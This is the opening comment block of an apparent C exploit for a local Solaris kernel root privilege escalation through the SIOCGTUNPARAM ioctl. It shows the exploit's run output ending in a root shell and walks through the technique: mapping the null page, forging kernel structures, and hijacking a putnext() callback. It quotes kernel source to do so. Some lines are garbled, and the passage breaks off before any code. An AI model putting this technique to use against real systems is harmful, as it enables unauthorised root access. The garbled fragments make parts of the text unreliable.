/***********************************************************
* hoagie_solaris_siocgtunparam.c |
* LOCAL SOLARIS KERNEL ROOT EXPLOIT (<> |
* |
* Bug reported by Tobias Klein |
* http://www.trapkit.de/advisories/TKADV2008-015.txt |
* Exploit by: peri.carding (http://www.void.at/main/) |
* |
* $ ./hoagie_solaris_siocgtunparam |
* hoagie_solaris_siocgtunparam.c - solaris root < <> |
* -andi / void.at |
* |
* [*] socket created |
* [*] mapping zero page successful |
* [*] process cred address: 0xd3853894 |
* [*] prepare null page |
* [*] clean up write queue |
* # uname -a |
* SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc |
* # id |
* uid=0(root) gid=0(root) |
* # |
* |
* First of all we have to make sure that ip_extract_tunreq() will |
* return 0 and ipifp is still set to NULL. This can be achieved by |
* using an interface alias starting with zero. (the interface ip.tun0 |
* must not exist because ipif_lookup_on_name() will "fail" to get |
* null page) |
* |
* ip_if.c / ipif_lookup_on_name() |
* ... |
* if (&cp[2] <> |
* return (NULL); |
* ... |
* |
* In ip_sioctl_tunparam() ipif->ipif_ill is used for mutex enter |
* so we have to set the offset for an ill_t structure. Later putnext() |
* will be called with a queue (see ill_t). We can use this queue to |
* add a custom callback function that is used by putnext(). |
* |
* ip_if.c / ip_sioctl_tunparam(): |
* ... |
* ill = ipif->ipif_ill; |
* mutex_enter(&connp->conn_lock); |
* mutex_enter(&ill->ill_lock); |
* ... |
* if (success) { |
* ip1dbg(("sending down tunparam request ")); |
* putnext(ill->ill_wq, mp1); |
* return (EINPROGRESS);